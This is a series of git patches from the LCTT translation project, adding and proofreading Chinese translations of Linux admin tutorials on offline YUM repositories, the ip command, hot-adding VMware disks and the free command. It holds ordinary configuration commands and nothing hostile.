-$ ln -s /var/ftp/pub /YUM
-```
-
-Now, restart server for implement the changes
-
-```
-$ systemctl restart vsftpd
-```
-
-### Configuring client machine
-
-We will now create a file named **offline-yum.repo** in **/etc/yum.repos.d** , as we did above & enter the following details,
-
-```
-$ vi /etc/yum.repos.d/offline-yum.repo
-```
-
-```
-[Offline YUM]
-name=Local YUM
-baseurl=ftp://192.168.1.100/pub/CentOS/7
-gpgcheck=0
-enabled=1
-```
-
-Your client machine is now ready to receive updates over ftp. For configuring vsftpd server to share files with other Linux system , [**read tutorial here**][2].
-
-Both methods for sharing an offline yum over LAN are good & you can choose either of them, both of these methods should work fine. If you are having any queries/comments, please share them in the comment box down below.
-
-
---------------------------------------------------------------------------------
-
-via: http://linuxtechlab.com/offline-yum-repository-for-lan/
-
-作者:[Shusain][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linuxtechlab.com/author/shsuain/
-[1]:http://linuxtechlab.com/creating-yum-repository-iso-online-repo/
-[2]:http://linuxtechlab.com/ftp-secure-installation-configuration/
diff --git a/translated/tech/20180103 Creating an Offline YUM repository for LAN.md b/translated/tech/20180103 Creating an Offline YUM repository for LAN.md
new file mode 100644
index 0000000000..7680e2dc3c
--- /dev/null
+++ b/translated/tech/20180103 Creating an Offline YUM repository for LAN.md
@@ -0,0 +1,108 @@
+创建局域网内的离线 YUM 仓库
+======
+在早先的教程中,我们讨论了" **[如何使用 ISO 镜像和镜像在线 yum 仓库的方式来创建自己的 yum 仓库 ][1]** "。创建自己的 yum 仓库是一个不错的想法,但若网络中只有 2-3 台 Linux 机器那就没啥必要了。不过若你的网络中有大量的 Linux 服务器,而且这些服务器还需要定时进行升级,或者你有大量服务器无法直接访问因特网,那么创建自己的 yum 仓库就很有必要了。
+
+当我们有大量的 Linux 服务器,而每个服务器都直接从因特网上升级系统时,数据消耗会很可观。为了节省数据量,我们可以创建个离线 yum 源并将之分享到本地网络中。网络中的其他 Linux 机器然后就可以直接从本地 yum 上获取系统更新,从而节省数据量,而且传输速度也会很好。
+
+我们可以使用下面两种方法来分享 yum 仓库:
+
+ * **使用 Web 服务器 (Apache)**
+ * **使用 ftp (VSFTPD)**
+
+
+在开始讲解这两个方法之前,我们需要先根据之前的教程创建一个 YUM 仓库( **[看这里 ][1]** )
+
+## 使用 Web 服务器
+
+首先在 yum 服务器上安装安装 Web 服务器 (Apache),我们假设服务器 IP 是 **192.168.1.100**。我们已经在这台系统上配置好了 yum 仓库,现在我们来使用 yum 命令安装 apache web 服务器,
+
+```
+$ yum install httpd
+```
+
+下一步,拷贝所有的 rpm 包到默认的 apache 跟目录下,即 **/var/www/html**,由于我们已经将包都拷贝到了 **/YUM** 下,我们也可以创建一个软连接来从 /var/www/html 指向 /YUM
+
+```
+$ ln -s /var/www/html/Centos /yum
+```
+
+重启 web 服务器应用变更
+
+```
+$ systemctl restart httpd
+```
+
+
+### 配置客户端机器
+
+服务端的配置就完成了,现在需要配置下客户端来从我们创建的离线 yum 中获取升级包,这里假设客户端 IP 为 **192.168.1.101**。
+
+在 `/etc/yum.repos.d` 目录中创建 `offline-yum.repo` 文件,输入如下信息,
+
+```
+$ vi /etc/yum.repos.d/offline-yum.repo
+```
+
+```
+name=Local YUM
+baseurl=http://192.168.1.100/CentOS/7
+gpgcheck=0
+enabled=1
+```
+
+客户端也配置完了。试一下用 yum 来安装/升级软件包来确认仓库是正常工作的。
+
+## 使用 FTP 服务器
+
+在 FTP 上分享 YUM,首先需要安装所需要的软件包,即 vsftpd
+
+```
+$ yum install vsftpd
+```
+
+vsftp 的默认根目录为 `/var/ftp/pub`,因此你可以拷贝 rpm 包到这个目录或着为它创建一个软连接,
+
+```
+$ ln -s /var/ftp/pub /YUM
+```
+
+重启服务应用变更
+
+```
+$ systemctl restart vsftpd
+```
+
+### 配置客户端机器
+
+像上面一样,在 `/etc/yum.repos.d` 中创建 **offline-yum.repo** 文件,并输入下面信息,
+
+```
+$ vi /etc/yum.repos.d/offline-yum.repo
+```
+
+```
+[Offline YUM]
+name=Local YUM
+baseurl=ftp://192.168.1.100/pub/CentOS/7
+gpgcheck=0
+enabled=1
+```
+
+现在客户机可以通过 ftp 接受升级了。要配置 vsftpd 服务器为其他 Linux 系统分享文件,请[**阅读这篇指南 **][2]。
+
+这两种方法都很不错,你可以任意选择其中一种方法。有任何疑问或这想说的话,欢迎在下面留言框中留言。
+
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/offline-yum-repository-for-lan/
+
+作者:[Shusain][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
+[1]:http://linuxtechlab.com/creating-yum-repository-iso-online-repo/
+[2]:http://linuxtechlab.com/ftp-secure-installation-configuration/
From 182d56377684186f6312b45857398e522f3ca48f Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 13 Jan 2018 11:05:42 +0800
Subject: [PATCH 285/371] PRF&PUB:20170915 12 ip Command Examples for Linux
Users.md
@lujun9972 https://linux.cn/article-9230-1.html
---
... 12 ip Command Examples for Linux Users.md | 99 +++++++++++--------
1 file changed, 59 insertions(+), 40 deletions(-)
rename {translated/tech => published}/20170915 12 ip Command Examples for Linux Users.md (68%)
diff --git a/translated/tech/20170915 12 ip Command Examples for Linux Users.md b/published/20170915 12 ip Command Examples for Linux Users.md
similarity index 68%
rename from translated/tech/20170915 12 ip Command Examples for Linux Users.md
rename to published/20170915 12 ip Command Examples for Linux Users.md
index 3fe629852b..258f548e62 100644
--- a/translated/tech/20170915 12 ip Command Examples for Linux Users.md
+++ b/published/20170915 12 ip Command Examples for Linux Users.md
@@ -1,6 +1,7 @@
-Linux 用户的 12 个 ip 案例
+12 个 ip 命令范例
======
-多年来我们一直使用 `ifconfig` 命令来执行网络相关的任务,比如检查和配置网卡信息。但是 `ifconfig` 已经不再被维护并且在最近版本的 Linux 中被废除了。`ifconfig` 命令已经被 `ip` 命令所替代了。
+
+一年又一年,我们一直在使用 `ifconfig` 命令来执行网络相关的任务,比如检查和配置网卡信息。但是 `ifconfig` 已经不再被维护,并且在最近版本的 Linux 中被废除了! `ifconfig` 命令已经被 `ip` 命令所替代了。
`ip` 命令跟 `ifconfig` 命令有些类似,但要强力的多,它有许多新功能。`ip` 命令完成很多 `ifconfig` 命令无法完成的任务。
@@ -10,16 +11,18 @@ Linux 用户的 12 个 ip 案例
### 案例 1:检查网卡信息
-检查网卡的诸如 IP 地址,子网等网络信息,使用 `ip addr show` 命令
+检查网卡的诸如 IP 地址,子网等网络信息,使用 `ip addr show` 命令:
+
```
[linuxtechi@localhost]$ ip addr show
-or
+或
[linuxtechi@localhost]$ ip a s
```
-这会显示系统中所有可用网卡额相关网络信息,不过如果你想查看某块网卡的信息,则命令为
+这会显示系统中所有可用网卡的相关网络信息,不过如果你想查看某块网卡的信息,则命令为:
+
```
[linuxtechi@localhost]$ ip addr show enp0s3
```
@@ -30,45 +33,52 @@ or
### 案例 2:启用/禁用网卡
-使用 `ip` 命令来启用一个被禁用的网卡
+使用 `ip` 命令来启用一个被禁用的网卡:
+
```
[linuxtechi@localhost]$ sudo ip link set enp0s3 up
```
-而要禁用网卡则使用 `down` 触发器,
+而要禁用网卡则使用 `down` 触发器:
+
```
[linuxtechi@localhost]$ sudo ip link set enp0s3 down
```
### 案例 3:为网卡分配 IP 地址以及其他网络信息
-要为网卡分配 IP 地址,我们使用下面命令
+要为网卡分配 IP 地址,我们使用下面命令:
+
```
[linuxtechi@localhost]$ sudo ip addr add 192.168.0.50/255.255.255.0 dev enp0s3
```
-也可以使用 `ip` 命令来设置广播地址。默认是没有设置广播地址的,设置广播地址的命令为
+也可以使用 `ip` 命令来设置广播地址。默认是没有设置广播地址的,设置广播地址的命令为:
+
```
[linuxtechi@localhost]$ sudo ip addr add broadcast 192.168.0.255 dev enp0s3
```
-我们也可以使用下面命令来根据 IP 地址设置标准的广播地址,
+我们也可以使用下面命令来根据 IP 地址设置标准的广播地址:
+
```
[linuxtechi@localhost]$ sudo ip addr add 192.168.0.10/24 brd + dev enp0s3
```
-若上面例子所示,我们可以使用 `brd` 代替 `broadcast` 来设置广播地址。
+如上面例子所示,我们可以使用 `brd` 代替 `broadcast` 来设置广播地址。
### 案例 4:删除网卡中配置的 IP 地址
-若想从网卡中删掉某个 IP,使用如下 ip 命令
+若想从网卡中删掉某个 IP,使用如下 `ip` 命令:
+
```
[linuxtechi@localhost]$ sudo ip addr del 192.168.0.10/24 dev enp0s3
```
-### 案例 5:为网卡添加别名(假设网卡名为 enp0s3)
+### 案例 5:为网卡添加别名(假设网卡名为 enp0s3)
+
+添加别名,即为网卡添加不止一个 IP,执行下面命令:
-添加别名,即为玩卡添加不止一个 IP,执行下面命令
```
[linuxtechi@localhost]$ sudo ip addr add 192.168.0.20/24 dev enp0s3 label enp0s3:1
```
@@ -77,38 +87,44 @@ or
### 案例 6:检查路由/默认网关的信息
-查看路由信息会给我们显示数据包到达目的地的路由路径。要查看网络路由信息,执行下面命令,
+查看路由信息会给我们显示数据包到达目的地的路由路径。要查看网络路由信息,执行下面命令:
+
```
[linuxtechi@localhost]$ ip route show
```
![ip-route-command-output][8]
-在上面输出结果中,我们能够看到所有网卡上数据包的路由信息。我们也可以获取特定 ip 的路由信息,方法是,
+在上面输出结果中,我们能够看到所有网卡上数据包的路由信息。我们也可以获取特定 IP 的路由信息,方法是:
+
```
[linuxtechi@localhost]$ sudo ip route get 192.168.0.1
```
### 案例 7:添加静态路由
-我们也可以使用 IP 来修改数据包的默认路由。方法是使用 `ip route` 命令
+我们也可以使用 IP 来修改数据包的默认路由。方法是使用 `ip route` 命令:
+
```
[linuxtechi@localhost]$ sudo ip route add default via 192.168.0.150/24
```
-这样所有的网络数据包通过 `192.168.0.150` 来转发,而不是以前的默认路由了。若要修改某个网卡的默认路由,执行
+这样所有的网络数据包通过 `192.168.0.150` 来转发,而不是以前的默认路由了。若要修改某个网卡的默认路由,执行:
+
```
[linuxtechi@localhost]$ sudo ip route add 172.16.32.32 via 192.168.0.150/24 dev enp0s3
```
### 案例 8:删除默认路由
-要删除之前设置的默认路由,打开终端然后运行,
+要删除之前设置的默认路由,打开终端然后运行:
+
```
[linuxtechi@localhost]$ sudo ip route del 192.168.0.150/24
```
-**注意:-** 用上面方法修改的默认路由只是临时有效的,在系统重启后所有的改动都会丢失。要永久修改路由,需要修改/创建 `route-enp0s3` 文件。将下面这行加入其中
+**注意:** 用上面方法修改的默认路由只是临时有效的,在系统重启后所有的改动都会丢失。要永久修改路由,需要修改或创建 `route-enp0s3` 文件。将下面这行加入其中:
+
```
[linuxtechi@localhost]$ sudo vi /etc/sysconfig/network-scripts/route-enp0s3
@@ -121,9 +137,10 @@ or
### 案例 9:检查所有的 ARP 记录
-ARP,是的 `Address Resolution Protocol` 缩写,用于将 IP 地址转换为物理地址(也就是 MAC 地址)。所有的 IP 和其对应的 MAC 明细都存储在一张表中,这张表叫做 ARP 缓存。
+ARP,是地址解析协议的缩写,用于将 IP 地址转换为物理地址(也就是 MAC 地址)。所有的 IP 和其对应的 MAC 明细都存储在一张表中,这张表叫做 ARP 缓存。
+
+要查看 ARP 缓存中的记录,即连接到局域网中设备的 MAC 地址,则使用如下 ip 命令:
-要查看 ARP 缓存中的记录,即连接到局域网中设备的 MAC 地址,则使用如下 ip 命令
```
[linuxtechi@localhost]$ ip neigh
```
@@ -132,28 +149,29 @@ ARP,是的 `Address Resolution Protocol` 缩写,用于将 IP 地址转换为
### 案例 10:修改 ARP 记录
-删除 ARP 记录的命令为
+删除 ARP 记录的命令为:
+
```
[linuxtechi@localhost]$ sudo ip neigh del 192.168.0.106 dev enp0s3
```
-若想往 ARP 缓存中添加新记录,则命令为
+若想往 ARP 缓存中添加新记录,则命令为:
+
```
[linuxtechi@localhost]$ sudo ip neigh add 192.168.0.150 lladdr 33:1g:75:37:r3:84 dev enp0s3 nud perm
```
-这里 **nud** 的意思是 **neghbour state( 邻居状态)**,它的值可以是
-
- * **perm** - 永久有效并且只能被管理员删除
- * **noarp** - 记录有效,但在生命周期过期后就允许被删除了
- * **stale** - 记录有效,但可能已经过期,
- * **reachable** - 记录有效,但超时后就失效了。
-
+这里 `nud` 的意思是 “neghbour state”(网络邻居状态),它的值可以是:
+ * `perm` - 永久有效并且只能被管理员删除
+ * `noarp` - 记录有效,但在生命周期过期后就允许被删除了
+ * `stale` - 记录有效,但可能已经过期
+ * `reachable` - 记录有效,但超时后就失效了
### 案例 11:查看网络统计信息
-通过 `ip` 命令还能查看网络的统计信息,比如所有网卡上传输的字节数和报文数,错误或丢弃的报文数等。使用 `ip -s link` 命令来查看
+通过 `ip` 命令还能查看网络的统计信息,比如所有网卡上传输的字节数和报文数,错误或丢弃的报文数等。使用 `ip -s link` 命令来查看:
+
```
[linuxtechi@localhost]$ ip -s link
```
@@ -162,7 +180,8 @@ ARP,是的 `Address Resolution Protocol` 缩写,用于将 IP 地址转换为
### 案例 12:获取帮助
-若你想查看某个上面例子中没有的选项,那么你可以查看帮助。事实上对任何命令你都可以寻求帮助。要列出 `ip` 命令的所有可选项,执行
+若你想查看某个上面例子中没有的选项,那么你可以查看帮助。事实上对任何命令你都可以寻求帮助。要列出 `ip` 命令的所有可选项,执行:
+
```
[linuxtechi@localhost]$ ip help
```
@@ -175,21 +194,21 @@ via: https://www.linuxtechi.com/ip-command-examples-for-linux-users/
作者:[Pradeep Kumar][a]
译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]:https://www.linuxtechi.com/author/pradeep/
[1]:https://www.linuxtechi.com/wp-content/plugins/lazy-load/images/1x1.trans.gif
[2]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg
-[3]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg ()
+[3]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-command-examples-Linux.jpg
[4]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg
-[5]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg ()
+[5]:https://www.linuxtechi.com/wp-content/uploads/2017/09/IP-addr-show-commant-output.jpg
[6]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg
-[7]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg ()
+[7]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-command-add-alias-linux.jpg
[8]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg
-[9]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg ()
+[9]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-route-command-output.jpg
[10]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg
-[11]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg ()
+[11]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-neigh-command-linux.jpg
[12]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg
-[13]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg ()
+[13]:https://www.linuxtechi.com/wp-content/uploads/2017/09/ip-s-command-linux.jpg
From 9469257f3a013f14ec3b4d264b448ab9601da1e1 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 13 Jan 2018 12:22:17 +0800
Subject: [PATCH 286/371] PRF:20090718 Vmware Linux Guest Add a New Hard Disk
Without Rebooting Guest.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@lujun9972 这篇是2009 年的,我没有验证过是否过时,但是选题过于老的文章,要注意看一下。此外,一般情况下,以三级标题开始为宜。
---
...a New Hard Disk Without Rebooting Guest.md | 72 ++++++++++---------
1 file changed, 37 insertions(+), 35 deletions(-)
diff --git a/translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md b/translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
index 6c57fd9090..f25ecbb2dc 100644
--- a/translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
+++ b/translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
@@ -1,43 +1,41 @@
在不重启的情况下为 Vmware Linux 客户机添加新硬盘
======
-作为一名系统管理员,我经常需要用额外的硬盘来扩充存储空间或将系统数据从用户数据中分离出来。将物理块设备加到虚拟主机的这个过程,告诉你如何将一个块主机上的硬盘加到一台使用 VMWare 软件虚拟化的 Linux 客户机上。
+作为一名系统管理员,我经常需要用额外的硬盘来扩充存储空间或将系统数据从用户数据中分离出来。我将告诉你在将物理块设备加到虚拟主机的这个过程中,如何将一个主机上的硬盘加到一台使用 VMWare 软件虚拟化的 Linux 客户机上。
-你可以显式的添加或删除一个 SCSI 设备,或者重新扫描整个 SCSI 总线而不用重启 Linux 虚拟机。本指南在 Vmware Server 和 Vmware Workstation v6.0 中通过测试(更老版本应该也支持)。所有命令在 RHEL,Fedora,CentOS 和 Ubuntu Linux 客户机 / 主机操作系统下都经过了测试。
+你可以显式的添加或删除一个 SCSI 设备,或者重新扫描整个 SCSI 总线而不用重启 Linux 虚拟机。本指南在 Vmware Server 和 Vmware Workstation v6.0 中通过测试(更老版本应该也支持)。所有命令在 RHEL、Fedora、CentOS 和 Ubuntu Linux 客户机 / 主机操作系统下都经过了测试。
+### 步骤 1:添加新硬盘到虚拟客户机
-## 步骤 # 1:添加新硬盘到虚拟客户机
-
-首先,通过 vmware 硬件设置菜单添加硬盘。
-点击 VM > Settings
+首先,通过 vmware 硬件设置菜单添加硬盘。点击 “VM > Settings”
![Fig.01:Vmware Virtual Machine Settings ][1]
-或者你也可以按下 CTRL + D 也能进入设置对话框。
+或者你也可以按下 `CTRL + D` 也能进入设置对话框。
-点击 Add+ 添加新硬盘到客户机:
+点击 “Add” 添加新硬盘到客户机:
![Fig.02:VMWare adding a new hardware][2]
-选择硬件类型为 Hard disk 然后点击 Next
+选择硬件类型为“Hard disk”然后点击 “Next”:
![Fig.03 VMware Adding a new disk wizard ][3]
-选择 `create a new virtual disk` 然后点击 Next
+选择 “create a new virtual disk” 然后点击 “Next”:
![Fig.04:Vmware Wizard Disk ][4]
-设置虚拟磁盘类型为 SCSI 然后点击 Next
+设置虚拟磁盘类型为 “SCSI” ,然后点击 “Next”:
![Fig.05:Vmware Virtual Disk][5]
-按需要设置最大磁盘大小,然后点击 Next
+按需要设置最大磁盘大小,然后点击 “Next”
![Fig.06:Finalizing Disk Virtual Addition ][6]
-最后,选择文件存放位置然后点击 Finish。
+最后,选择文件存放位置然后点击 “Finish”。
-## 步骤 # 2:重新扫描 SCSI 总线,在不重启虚拟机的情况下添加 SCSI 设备
+### 步骤 2:重新扫描 SCSI 总线,在不重启虚拟机的情况下添加 SCSI 设备
输入下面命令重新扫描 SCSI 总线:
@@ -51,7 +49,7 @@ tail -f /var/log/message
![Linux Vmware Rescan New Scsi Disk Without Reboot][7]
-你需要将 `host#` 替换成真实的值,比如 host0。你可以通过下面命令来查出这个值:
+你需要将 `host#` 替换成真实的值,比如 `host0`。你可以通过下面命令来查出这个值:
`# ls /sys/class/scsi_host`
@@ -108,7 +106,7 @@ Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi disk sdc
Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi generic sg2 type 0
```
-### 如何删除 =/dev/sdc= 这块设备?
+#### 如何删除 /dev/sdc 这块设备?
除了重新扫描整个总线外,你也可以使用下面命令添加或删除指定磁盘:
@@ -117,7 +115,7 @@ Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi generic sg2 type 0
# echo 1 > /sys/block/sdc/device/delete
```
-### 如何添加 =/dev/sdc= 这块设备?
+#### 如何添加 /dev/sdc 这块设备?
使用下面语法添加指定设备:
@@ -127,14 +125,12 @@ Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi generic sg2 type 0
这里,
- * :Host
- * :Bus (Channel)
- * :Target (Id)
- * :LUN numbers
+ * :主机
+ * :总线(通道)
+ * :目标 (Id)
+ * :LUN 号
-
-
-例如。使用参数 host#0,bus#0,target#2,以及 LUN#0 来添加 /dev/sdc,则输入:
+例如。使用参数 `host#0`,`bus#0`,`target#2`,以及 `LUN#0` 来添加 `/dev/sdc`,则输入:
```
# echo "scsi add-single-device 0 0 2 0">/proc/scsi/scsi
@@ -157,7 +153,7 @@ Host: scsi0 Channel: 00 Id: 02 Lun: 00
Type: Direct-Access ANSI SCSI revision: 02
```
-## 步骤 #3:格式化新磁盘
+### 步骤 #3:格式化新磁盘
现在使用 [fdisk 并通过 mkfs.ext3][8] 命令创建分区:
@@ -169,13 +165,17 @@ Host: scsi0 Channel: 00 Id: 02 Lun: 00
# mkfs.ext4 /dev/sdc3
```
-## 步骤 #4:创建挂载点并更新 /etc/fstab
+### 步骤 #4:创建挂载点并更新 /etc/fstab
-`# mkdir /disk3`
+```
+# mkdir /disk3
+```
-打开 /etc/fstab 文件,输入:
+打开 `/etc/fstab` 文件,输入:
-`# vi /etc/fstab`
+```
+# vi /etc/fstab
+```
加入下面这行:
@@ -193,15 +193,17 @@ Host: scsi0 Channel: 00 Id: 02 Lun: 00
#### 可选操作:为分区加标签
-[你可以使用 e2label 命令为分区加标签 ][9]。假设,你想要为 /backupDisk 这块新分区加标签,则输入
+[你可以使用 e2label 命令为分区加标签 ][9]。假设,你想要为 `/backupDisk` 这块新分区加标签,则输入:
-`# e2label /dev/sdc1 /backupDisk`
+```
+# e2label /dev/sdc1 /backupDisk
+```
-详情参见 "[Linux 分区的重要性 ][10]
+详情参见 "[Linux 分区的重要性 ][10]。
-## 关于作者
+### 关于作者
-作者即是 nixCraft 的创造者,也是一名经验丰富的系统管理员,还是 Linux 操作系统 /Unix shell 脚本培训师。他曾服务过全球客户并与多个行业合作过,包括 IT,教育,国防和空间研究,以及非盈利机构。你可以在 [Twitter][11],[Facebook][12],[Google+][13] 上关注它。
+作者是 nixCraft 的创始人,也是一名经验丰富的系统管理员,还是 Linux 操作系统 /Unix shell 脚本培训师。他曾服务过全球客户并与多个行业合作过,包括 IT,教育,国防和空间研究,以及非盈利机构。你可以在 [Twitter][11],[Facebook][12],[Google+][13] 上关注他。
--------------------------------------------------------------------------------
@@ -209,7 +211,7 @@ via: https://www.cyberciti.biz/tips/vmware-add-a-new-hard-disk-without-rebooting
作者:[Vivek Gite][a]
译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 8a65a30b93ca0be73b80ca909513f591622d1819 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 13 Jan 2018 12:22:39 +0800
Subject: [PATCH 287/371] PUB:20090718 Vmware Linux Guest Add a New Hard Disk
Without Rebooting Guest.md
@lujun9972 https://linux.cn/article-9231-1.html
---
...are Linux Guest Add a New Hard Disk Without Rebooting Guest.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md (100%)
diff --git a/translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md b/published/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
similarity index 100%
rename from translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
rename to published/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
From d15e989f0e9bd354cc5ad8451b60ab8dc00295dd Mon Sep 17 00:00:00 2001
From: kimii <2545489745@qq.com>
Date: Sat, 13 Jan 2018 05:08:03 +0000
Subject: [PATCH 288/371] Update 20171019 More ways to examine network
connections on Linux.md
---
...20171019 More ways to examine network connections on Linux.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20171019 More ways to examine network connections on Linux.md b/sources/tech/20171019 More ways to examine network connections on Linux.md
index 1583882158..41e19559bf 100644
--- a/sources/tech/20171019 More ways to examine network connections on Linux.md
+++ b/sources/tech/20171019 More ways to examine network connections on Linux.md
@@ -1,3 +1,4 @@
+translating by kimii
More ways to examine network connections on Linux
======
The ifconfig and netstat commands are incredibly useful, but there are many other commands that can help you see what's up with you network on Linux systems. Today's post explores some very handy commands for examining network connections.
From 6ee9c9d48707cbd8cae1a277ac37031cefb1f920 Mon Sep 17 00:00:00 2001
From: jessie-pang <35220454+jessie-pang@users.noreply.github.com>
Date: Sat, 13 Jan 2018 14:34:03 +0800
Subject: [PATCH 289/371] Delete 20170925 Linux Free Command Explained for
Beginners (6 Examples).md
---
...nd Explained for Beginners (6 Examples).md | 122 ------------------
1 file changed, 122 deletions(-)
delete mode 100644 sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
diff --git a/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md b/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
deleted file mode 100644
index 5773719420..0000000000
--- a/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
+++ /dev/null
@@ -1,122 +0,0 @@
-Translating by jessie-pang
-
-Linux Free Command Explained for Beginners (6 Examples)
-======
-
-Sometimes, while working on the command line in Linux, you might want to quickly take a look at the total available as well as used memory in the system. If you're a Linux newbie, you'll be glad to know there exists a built-in command - dubbed **free** \- that displays this kind of information.
-
-In this tutorial, we will discuss the basics of the free command as well as some of the important features it provides. But before we do that, it's worth sharing that all commands/instructions mentioned here have been tested on Ubuntu 16.04LTS.
-
-### Linux free command
-
-Here's the syntax of the free command:
-
-free [options]
-
-And following is how the tool's man page describes it:
-```
-free displays the total amount of free and used physical and swap memory in the system, as well as
-the buffers and caches used by the kernel. The information is gathered by parsing
-/proc/meminfo.
-```
-
-Following are some Q&A-styled examples that should give you a good idea about how the free command works.
-
-### Q1. How to view used and available memory using free command?
-
-This is very easy. All you have to do is to run the free command without any options.
-
-free
-
-Here's the output the free command produced on my system:
-
-[![view used and available memory using free command][1]][2]
-
-And here's what these columns mean:
-
-[![Free command columns][3]][4]
-
-### Q2. How to change the display metric?
-
-If you want, you can change the display metric of memory figures that the free command produces in output. For example, if you want to display memory in megabytes, you can use the **-m** command line option.
-
-free -m
-
-[![free command display metrics change][5]][6]
-
-Similarly, you can use **-b** for bytes, **-k** for kilobytes, **-m** for megabytes, **-g** for gigabytes, **\--tera** for terabytes.
-
-### Q3. How to display memory figures in human readable form?
-
-The free command also offers an option **-h** through which you can ask the tool to display memory figures in human-readable form.
-
-free -h
-
-With this option turned on, the command decides for itself which display metric to use for individual memory figures. For example, here's how the -h option worked in our case:
-
-[![diplsy data fromm free command in human readable form][7]][8]
-
-### Q4. How to make free display results continuously with time gap?
-
-If you want, you can also have the free command executed in a way that it continuously displays output after a set time gap. For this, use the **-s** command line option. This option requires user to pass a numeric value that will be treated as the number of seconds after which output will be displayed.
-
-For example, to keep a gap of 3 seconds, run the command in the following way:
-
-free -s 3
-
-In this setup, if you want free to run only a set number of times, you can use the **-c** command option, which requires a count value to be passed to it. For example:
-
-free -s 3 -c 5
-
-The aforementioned command will make sure the tool runs 5 times, with a 3 second time gap between each of the tries.
-
-**Note** : This functionality is currently [buggy][9], so we couldn't test it at our end.
-
-### Q5. How to make free use power of 1000 (not 1024) while displaying memory figures?
-
-If you change the display metric to say megabytes (using -m option), but want the figures to be calculated based on power of 1,000 (not 1024), then this can be done using the **\--si** option. For example, the following screenshot shows the difference in output with and without this option:
-
-[![How to make free use power of 1000 \(not 1024\) while displaying memory figures][10]][11]
-
-### Q6. How to make free display total of columns?
-
-If you want free to display a total of all memory figures in each column, then you can use the **-t** command line option.
-
-free -t
-
-Following screenshot shows this command line option in action:
-
-[![How to make free display total of columns][12]][13]
-
-Note the new 'Total' row that's displayed in this case.
-
-### Conclusion
-
-The free command can prove to be an extremely useful tool if you're into system administration. It's easy to understand and use, with many options to customize output. We've covered many useful options in this tutorial. After you're done practicing these, head to the command's [man page][14] for more.
-
-
---------------------------------------------------------------------------------
-
-via: https://www.howtoforge.com/linux-free-command/
-
-作者:[Himanshu Arora][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.howtoforge.com
-[1]:https://www.howtoforge.com/images/linux_free_command/free-command-output.png
-[2]:https://www.howtoforge.com/images/linux_free_command/big/free-command-output.png
-[3]:https://www.howtoforge.com/images/linux_free_command/free-output-columns.png
-[4]:https://www.howtoforge.com/images/linux_free_command/big/free-output-columns.png
-[5]:https://www.howtoforge.com/images/linux_free_command/free-m-option.png
-[6]:https://www.howtoforge.com/images/linux_free_command/big/free-m-option.png
-[7]:https://www.howtoforge.com/images/linux_free_command/free-h.png
